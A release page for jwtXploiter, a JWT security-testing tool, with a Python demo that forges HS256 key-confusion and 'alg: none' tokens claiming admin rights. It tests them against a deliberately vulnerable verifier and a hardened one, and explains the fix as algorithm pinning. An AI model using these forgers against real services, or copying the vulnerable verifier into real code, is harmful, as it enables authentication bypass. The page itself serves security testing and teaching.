
jwtxploiter-1.0

DontPanicO released this 30 Jan 16:25

A command line tool for testing the security of JSON Web Tokens.
Test JWTs against all known CVEs and more:

  • Tamper with the token payload: change the values of claims and sub-claims.
  • Exploit header parameters known to be abusable (kid, jku, x5u)
  • Verify a token
  • Retrieve the public key from the target's TLS certificate and use it in a key confusion attack (the RSA public key fed to the verifier as an HMAC secret) with a single option
  • All JWA algorithms supported
  • Generate a JWK and embed it in the token header
  • And much, much more!
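The key confusion attack listed above is worth seeing end to end. The following is an added, stand-alone example written for this page; it is not jwtXploiter's own code. It builds the two forged tokens the tool automates (an HS256 token signed with the server's public key bytes, and an `alg: none` token) and checks them against a verifier that trusts the header's `alg` beside one that pins the algorithm. The `PUBLIC_KEY_PEM` constant is a constructed placeholder standing in for the key you would pull from the target's TLS certificate; only its bytes matter for the HMAC path, and the genuine RS256 branch (which needs the `cryptography` package) is never reached here.

```python
"""JWT algorithm-confusion demo: forged tokens against a vulnerable and a
hardened verifier. Added example, not part of jwtXploiter. Uses only the
standard library for the paths it exercises."""
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed placeholder: stands in for the RSA public key fetched from the
# target's TLS certificate or JWKS. It is NOT a real key; the attack only needs
# the exact bytes the server hands to its JWT library.
PUBLIC_KEY_PEM = (
    b"-----BEGIN PUBLIC KEY-----\n"
    + base64.b64encode(b"constructed placeholder, not a real RSA key")
    + b"\n-----END PUBLIC KEY-----\n"
)


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def forge_hs256_with_public_key(claims: dict, public_key_pem: bytes) -> str:
    """Key confusion: HMAC-SHA256 over the token using the server's *public*
    key bytes as the secret, with the header switched from RS256 to HS256."""
    header, payload = _segment({"alg": "HS256", "typ": "JWT"}), _segment(claims)
    sig = hmac.new(public_key_pem, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"


def forge_alg_none(claims: dict) -> str:
    """The classic unsigned token: alg=none with an empty signature segment."""
    return f"{_segment({'alg': 'none', 'typ': 'JWT'})}.{_segment(claims)}."


def vulnerable_verify(token: str, key_material: bytes) -> Optional[dict]:
    """Dispatches on the header's alg and hands the same key bytes to every
    algorithm. Returns the claims on success, None on failure."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    signing_input = f"{header_b64}.{payload_b64}".encode()
    sig = b64url_decode(sig_b64)
    alg = header.get("alg")
    if alg == "none":
        ok = sig == b""  # accepts an unsigned token outright
    elif alg == "HS256":
        expected = hmac.new(key_material, signing_input, hashlib.sha256).digest()
        ok = hmac.compare_digest(sig, expected)
    elif alg == "RS256":
        # Genuine RSA verification; requires the `cryptography` package and is
        # not exercised by the forged tokens in this demo.
        from cryptography.hazmat.primitives import hashes, serialization
        from cryptography.hazmat.primitives.asymmetric import padding
        pub = serialization.load_pem_public_key(key_material)
        try:
            pub.verify(sig, signing_input, padding.PKCS1v15(), hashes.SHA256())
            ok = True
        except Exception:
            ok = False
    else:
        ok = False
    return json.loads(b64url_decode(payload_b64)) if ok else None


def hardened_verify(token: str, key_material: bytes, expected_alg: str = "RS256") -> Optional[dict]:
    """Pins the algorithm from server configuration. The header's alg is only
    compared for equality, never used to choose the verification routine."""
    header = json.loads(b64url_decode(token.split(".")[0]))
    if header.get("alg") != expected_alg or expected_alg == "none":
        return None
    return vulnerable_verify(token, key_material)  # alg is now known-good


if __name__ == "__main__":
    claims = {"sub": "admin", "role": "superuser"}
    for name, tok in (("HS256 key confusion", forge_hs256_with_public_key(claims, PUBLIC_KEY_PEM)),
                      ("alg none", forge_alg_none(claims))):
        print(f"{name}: vulnerable={vulnerable_verify(tok, PUBLIC_KEY_PEM)} "
              f"hardened={hardened_verify(tok, PUBLIC_KEY_PEM)}")
```

The fix on the hardened side is the one that matters in practice: the accepted algorithm (and the key type it goes with) comes from server configuration, and a token whose header disagrees is rejected before any cryptography runs.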

The software is distributed as an rpm package or a plain tarball. A Debian package will be provided soon. Until a man page for Linux distributions is released, the repository wiki serves as the documentation: https://github.com/DontPanicO/jwtXploiter/wiki